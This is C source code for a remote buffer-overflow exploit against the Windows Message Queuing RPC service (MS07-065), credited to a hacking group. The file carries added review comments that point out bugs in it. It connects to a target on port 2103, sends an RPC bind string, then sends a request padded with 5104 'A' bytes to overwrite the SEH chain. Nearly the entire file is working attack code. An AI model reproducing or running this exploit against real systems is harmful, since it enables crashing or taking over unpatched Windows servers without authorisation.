void Disconnect(SOCKET s);
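// ripped from isno
/*
 * Make_Connection: open a TCP connection to address:port, waiting at most
 * `timeout` seconds for the handshake to complete.
 *
 * address  dotted-quad IPv4 string handed to inet_addr() (no hostname lookup)
 * port     TCP port in host byte order
 * timeout  seconds to wait in select() for the non-blocking connect to finish
 *
 * Returns the connected socket, switched back to blocking mode, or a
 * negative code: -1 socket() failed, -2 address missing or unparsable,
 * -3 select() failed, -4 timed out, -5 connect() failed (immediately or
 * as reported by SO_ERROR).  The caller owns the returned socket and must
 * closesocket() it.
 */
int Make_Connection(char *address, int port, int timeout)
{
    struct sockaddr_in target = {0};
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    /* inet_addr(NULL) is undefined; the caller may pass an unset target. */
    if (address == NULL) {
        return -2;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    /* SOCKET is unsigned on Winsock: failure is INVALID_SOCKET, never < 0. */
    if (s == INVALID_SOCKET) {
        return -1;
    }

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    /* inet_addr() reports a malformed string as INADDR_NONE, not 0;
     * 0 (0.0.0.0) is kept as a rejected value for compatibility. */
    if (target.sin_addr.s_addr == INADDR_NONE || target.sin_addr.s_addr == 0) {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons((unsigned short)port);

    /* Non-blocking connect so the handshake can be bounded by select(). */
    bf = 1;
    ioctlsocket(s, FIONBIO, &bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);

    /* On a non-blocking socket WSAEWOULDBLOCK is the normal "in progress"
     * result; any other connect() failure is final. */
    if (connect(s, (struct sockaddr *)&target, sizeof(target)) == SOCKET_ERROR
        && WSAGetLastError() != WSAEWOULDBLOCK) {
        closesocket(s);
        return -5;
    }

    /* Wait for writability (= handshake finished, successfully or not). */
    i = select(s + 1, 0, &wd, 0, &tv);
    if (i == SOCKET_ERROR) {
        closesocket(s);
        return -3;
    }
    if (i == 0) {
        closesocket(s);
        return -4;
    }

    /* Writable does not mean connected: read the pending error, if any. */
    i = sizeof(int);
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, (char *)&bf, &i) != 0
        || bf != 0 || i != sizeof(int)) {
        closesocket(s);
        return -5;
    }

    /* Restore blocking mode before handing the socket to the caller. */
    bf = 0;
    ioctlsocket(s, FIONBIO, &bf);
    return s;
}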
/*
 * Disconnect: close the socket and then shut down Winsock for the whole
 * process (WSACleanup), so it is meant to be called once, at the end.
 * Return values of both calls are deliberately ignored.
 */
void Disconnect(SOCKET s)
{
    (void)closesocket(s);
    (void)WSACleanup();
}
/****************************************************/
/*
 * main: parse -h <address> / -p <port>, connect, and send the prepared
 * RPC bind / request byte strings (bind_str, request_1, request_2 are
 * defined elsewhere in this file).  Exits 1 on Winsock or connect failure.
 */
int main(int argc, char * argv[]){
unsigned char * target = NULL; int port = 2103; int i;
/* ret receives the recv() byte count but is never read afterwards. */
int ret; char buffer[6000] = {0}; SOCKET s; WSADATA WSAData;
printf("--------------------------------------------------------------------------\n"); printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n"); printf("-== code by axis@ph4nt0m ==-\n"); printf("-== Http://www.ph4nt0m.org ==-\n"); printf("-== Tested against Windows 2000 server SP4 ==-\n"); printf("--------------------------------------------------------------------------\n\n");
if (argc==1) usage(argv[0]);
//Handle parameters
/* NOTE(review): argv[i+1] is read without checking i+1 < argc, so an
 * option given as the last argument reads past the argv array; -h is
 * also never required, leaving target NULL for Make_Connection(). */
for(i=1;i<argc;i++) { if ( (argv[i][0]=='-') ) { switch (argv[i][1]) { case 'h': target=(unsigned char *)argv[i+1]; break; case 'p': if (strcmp(argv[i+1],"2103")==0) { printf("[+] Attacking default port 2103\n"); } else { port=atoi(argv[i+1]); } break; default: printf("[-] Invalid argument: %s\n",argv[i]); usage(argv[0]); break; } i++; } else usage(argv[0]); }
/********************** attack payload ***************************/
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { fprintf(stderr, "[-] WSAStartup failed.\n"); WSACleanup(); exit(1); }
//Sleep(1200);
/* NOTE(review): s is a SOCKET (unsigned on Winsock), so the negative
 * error codes returned by Make_Connection() wrap to large values and
 * this s<0 test can never fire; a connect failure is not detected here. */
s = Make_Connection((char *)target, port, 10); if(s<0) { fprintf(stderr, "[-] connect err.\n"); exit(1); }
//Send our evil Payload
printf("[*]Sending our Payload, Good Luck! ^_^\n"); printf("[*]Sending RPC Bind String!\n"); send(s, bind_str, sizeof(bind_str), 0);
Sleep(1000); printf("[*]Sending RPC Request Now!\n");
memset(buffer, '\x41', sizeof(buffer)); // fill the buffer to trigger seh
/* send() return values (partial writes, errors) are not checked. */
send(s, request_1, sizeof(request_1), 0); send(s, buffer, 5104, 0); // fill the buffer to trigger seh
send(s, request_2, sizeof(request_2), 0);
Sleep(100);
/* sizeof(buffer)-1 keeps one byte free so the reply stays NUL-terminated. */
memset(buffer, 0, sizeof(buffer)); ret = recv(s, buffer, sizeof(buffer)-1, 0); //printf("recv: %s\n", buffer);
Disconnect(s);
return 0; }